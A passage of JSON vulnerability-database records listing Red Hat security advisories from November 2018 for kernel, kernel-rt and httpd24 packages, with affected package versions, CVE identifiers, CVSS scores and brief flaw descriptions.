"packageFilename": "kernel-debuginfo-common-ppc64-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-debuginfo-common-ppc64le", "packageFilename": "kernel-debuginfo-common-ppc64le-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-debuginfo-common-s390x", "packageFilename": "kernel-debuginfo-common-s390x-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-debuginfo-common-x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-3.10.0-693.43.1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-kdump-debuginfo", "packageFilename": "kernel-kdump-debuginfo-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-tools-debuginfo", "packageFilename": "kernel-tools-debuginfo-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-tools-debuginfo", "packageFilename": "kernel-tools-debuginfo-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-tools-debuginfo", "packageFilename": "kernel-tools-debuginfo-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "perf", "packageFilename": "perf-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "perf", "packageFilename": "perf-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "perf", "packageFilename": "perf-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw named FragmentSmack was found in the way the Linux kernel handled reassembly of fragmented IPv4 and IPv6 packets. A remote attacker could use this flaw to trigger time and calculation expensive fragment reassembly algorithm by sending specially crafted packets which could lead to a CPU saturation and hence a denial of service on the system. (CVE-2018-5391)\n\n* kernel: out-of-bounds access in the show_timer function in kernel/time/posix-timers.c (CVE-2017-18344)\n\n* kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact (CVE-2018-10675)\n\n* kernel: Integer overflow in Linux's create_elf_tables function (CVE-2018-14634)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Juha-Matti Tilli (Aalto University - Department of Communications and Networking and Nokia Bell Labs) for reporting CVE-2018-5391 and Qualys Research Labs for reporting CVE-2018-14634.\n\nBug Fix(es):\n\nThese updated kernel packages include also numerous bug fixes. Space precludes documenting all of the bug fixes in this advisory. See the descriptions in the related Knowledge Article: https://access.redhat.com/articles/3684891", "reporter": "RedHat", "published": "2018-11-13T20:40:59", "type": "redhat", "title": "(RHSA-2018:3540) Important: kernel security, bug fix, and enhancement update", "enchantments": {"score": {"modified": "2018-11-13T16:43:59", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-18344", "CVE-2018-10675", "CVE-2018-14634", "CVE-2018-5391"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-11-13T20:42:53", "id": "RHSA-2018:3540", "href": "https://access.redhat.com/errata/RHSA-2018:3540", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T16:44:00", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "src", "packageName": "kernel-rt", "packageFilename": "kernel-rt-3.10.0-693.43.1.rt56.630.el6rt.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt", "packageFilename": "kernel-rt-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debug", "packageFilename": "kernel-rt-debug-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debug-debuginfo", "packageFilename": "kernel-rt-debug-debuginfo-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debug-devel", "packageFilename": "kernel-rt-debug-devel-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debuginfo", "packageFilename": "kernel-rt-debuginfo-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debuginfo-common-x86_64", "packageFilename": "kernel-rt-debuginfo-common-x86_64-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-devel", "packageFilename": "kernel-rt-devel-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "noarch", "packageName": "kernel-rt-doc", "packageFilename": "kernel-rt-doc-3.10.0-693.43.1.rt56.630.el6rt.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "noarch", "packageName": "kernel-rt-firmware", "packageFilename": "kernel-rt-firmware-3.10.0-693.43.1.rt56.630.el6rt.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-trace", "packageFilename": "kernel-rt-trace-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-trace-debuginfo", "packageFilename": "kernel-rt-trace-debuginfo-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-trace-devel", "packageFilename": "kernel-rt-trace-devel-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-vanilla", "packageFilename": "kernel-rt-vanilla-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-vanilla-debuginfo", "packageFilename": "kernel-rt-vanilla-debuginfo-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-693.43.1.rt56.630.el6rt", "arch": "x86_64", "packageName": "kernel-rt-vanilla-devel", "packageFilename": "kernel-rt-vanilla-devel-3.10.0-693.43.1.rt56.630.el6rt.x86_64.rpm", "operator": "lt"}], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A flaw named FragmentSmack was found in the way the Linux kernel handled reassembly of fragmented IPv4 and IPv6 packets. A remote attacker could use this flaw to trigger time and calculation expensive fragment reassembly algorithm by sending specially crafted packets which could lead to a CPU saturation and hence a denial of service on the system. (CVE-2018-5391)\n\n* kernel: out-of-bounds access in the show_timer function in kernel/time/posix-timers.c (CVE-2017-18344)\n\n* kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact (CVE-2018-10675)\n\n* kernel: Integer overflow in Linux's create_elf_tables function (CVE-2018-14634)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Juha-Matti Tilli (Aalto University - Department of Communications and Networking and Nokia Bell Labs) for reporting CVE-2018-5391 and Qualys Research Labs for reporting CVE-2018-14634.\n\nBug Fix(es):\n\n* The kernel-rt packages have been upgraded to the 3.10.0-693.43.1 source tree, which provides a number of bug fixes over the previous version. (BZ#1632422)", "reporter": "RedHat", "published": "2018-11-13T20:38:51", "type": "redhat", "title": "(RHSA-2018:3586) Important: kernel-rt security and bug fix update", "enchantments": {"score": {"modified": "2018-11-13T16:44:00", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-18344", "CVE-2018-10675", "CVE-2018-14634", "CVE-2018-5391"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-11-13T20:40:07", "id": "RHSA-2018:3586", "href": "https://access.redhat.com/errata/RHSA-2018:3586", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T08:42:33", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.61.1-1.el6", "arch": "src", "packageName": "httpd24-curl", "packageFilename": "httpd24-curl-7.61.1-1.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.61.1-1.el6", "arch": "x86_64", "packageName": "httpd24-curl", "packageFilename": "httpd24-curl-7.61.1-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "aarch64", "packageName": "httpd24-curl", "packageFilename": "httpd24-curl-7.61.1-1.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "ppc64le", "packageName": "httpd24-curl", "packageFilename": "httpd24-curl-7.61.1-1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "s390x", "packageName": "httpd24-curl", "packageFilename": "httpd24-curl-7.61.1-1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "src", "packageName": "httpd24-curl", "packageFilename": "httpd24-curl-7.61.1-1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "x86_64", "packageName": "httpd24-curl", "packageFilename": "httpd24-curl-7.61.1-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.61.1-1.el6", "arch": "x86_64", "packageName": "httpd24-curl-debuginfo", "packageFilename": "httpd24-curl-debuginfo-7.61.1-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "aarch64", "packageName": "httpd24-curl-debuginfo", "packageFilename": "httpd24-curl-debuginfo-7.61.1-1.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "ppc64le", "packageName": "httpd24-curl-debuginfo", "packageFilename": "httpd24-curl-debuginfo-7.61.1-1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "s390x", "packageName": "httpd24-curl-debuginfo", "packageFilename": "httpd24-curl-debuginfo-7.61.1-1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "x86_64", "packageName": "httpd24-curl-debuginfo", "packageFilename": "httpd24-curl-debuginfo-7.61.1-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "src", "packageName": "httpd24-httpd", "packageFilename": "httpd24-httpd-2.4.34-7.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "x86_64", "packageName": "httpd24-httpd", "packageFilename": "httpd24-httpd-2.4.34-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "aarch64", "packageName": "httpd24-httpd", "packageFilename": "httpd24-httpd-2.4.34-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "ppc64le", "packageName": "httpd24-httpd", "packageFilename": "httpd24-httpd-2.4.34-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "s390x", "packageName": "httpd24-httpd", "packageFilename": "httpd24-httpd-2.4.34-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "src", "packageName": "httpd24-httpd", "packageFilename": "httpd24-httpd-2.4.34-7.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "x86_64", "packageName": "httpd24-httpd", "packageFilename": "httpd24-httpd-2.4.34-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "x86_64", "packageName": "httpd24-httpd-debuginfo", "packageFilename": "httpd24-httpd-debuginfo-2.4.34-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "aarch64", "packageName": "httpd24-httpd-debuginfo", "packageFilename": "httpd24-httpd-debuginfo-2.4.34-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "ppc64le", "packageName": "httpd24-httpd-debuginfo", "packageFilename": "httpd24-httpd-debuginfo-2.4.34-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "s390x", "packageName": "httpd24-httpd-debuginfo", "packageFilename": "httpd24-httpd-debuginfo-2.4.34-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "x86_64", "packageName": "httpd24-httpd-debuginfo", "packageFilename": "httpd24-httpd-debuginfo-2.4.34-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "x86_64", "packageName": "httpd24-httpd-devel", "packageFilename": "httpd24-httpd-devel-2.4.34-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "aarch64", "packageName": "httpd24-httpd-devel", "packageFilename": "httpd24-httpd-devel-2.4.34-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "ppc64le", "packageName": "httpd24-httpd-devel", "packageFilename": "httpd24-httpd-devel-2.4.34-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "s390x", "packageName": "httpd24-httpd-devel", "packageFilename": "httpd24-httpd-devel-2.4.34-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "x86_64", "packageName": "httpd24-httpd-devel", "packageFilename": "httpd24-httpd-devel-2.4.34-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "noarch", "packageName": "httpd24-httpd-manual", "packageFilename": "httpd24-httpd-manual-2.4.34-7.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "noarch", "packageName": "httpd24-httpd-manual", "packageFilename": "httpd24-httpd-manual-2.4.34-7.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "x86_64", "packageName": "httpd24-httpd-tools", "packageFilename": "httpd24-httpd-tools-2.4.34-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "aarch64", "packageName": "httpd24-httpd-tools", "packageFilename": "httpd24-httpd-tools-2.4.34-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "ppc64le", "packageName": "httpd24-httpd-tools", "packageFilename": "httpd24-httpd-tools-2.4.34-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "s390x", "packageName": "httpd24-httpd-tools", "packageFilename": "httpd24-httpd-tools-2.4.34-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "x86_64", "packageName": "httpd24-httpd-tools", "packageFilename": "httpd24-httpd-tools-2.4.34-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.61.1-1.el6", "arch": "x86_64", "packageName": "httpd24-libcurl", "packageFilename": "httpd24-libcurl-7.61.1-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "aarch64", "packageName": "httpd24-libcurl", "packageFilename": "httpd24-libcurl-7.61.1-1.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "ppc64le", "packageName": "httpd24-libcurl", "packageFilename": "httpd24-libcurl-7.61.1-1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "s390x", "packageName": "httpd24-libcurl", "packageFilename": "httpd24-libcurl-7.61.1-1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "x86_64", "packageName": "httpd24-libcurl", "packageFilename": "httpd24-libcurl-7.61.1-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.61.1-1.el6", "arch": "x86_64", "packageName": "httpd24-libcurl-devel", "packageFilename": "httpd24-libcurl-devel-7.61.1-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "aarch64", "packageName": "httpd24-libcurl-devel", "packageFilename": "httpd24-libcurl-devel-7.61.1-1.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "ppc64le", "packageName": "httpd24-libcurl-devel", "packageFilename": "httpd24-libcurl-devel-7.61.1-1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "s390x", "packageName": "httpd24-libcurl-devel", "packageFilename": "httpd24-libcurl-devel-7.61.1-1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.61.1-1.el7", "arch": "x86_64", "packageName": "httpd24-libcurl-devel", "packageFilename": "httpd24-libcurl-devel-7.61.1-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.1-7.el6", "arch": "x86_64", "packageName": "httpd24-libnghttp2", "packageFilename": "httpd24-libnghttp2-1.7.1-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "aarch64", "packageName": "httpd24-libnghttp2", "packageFilename": 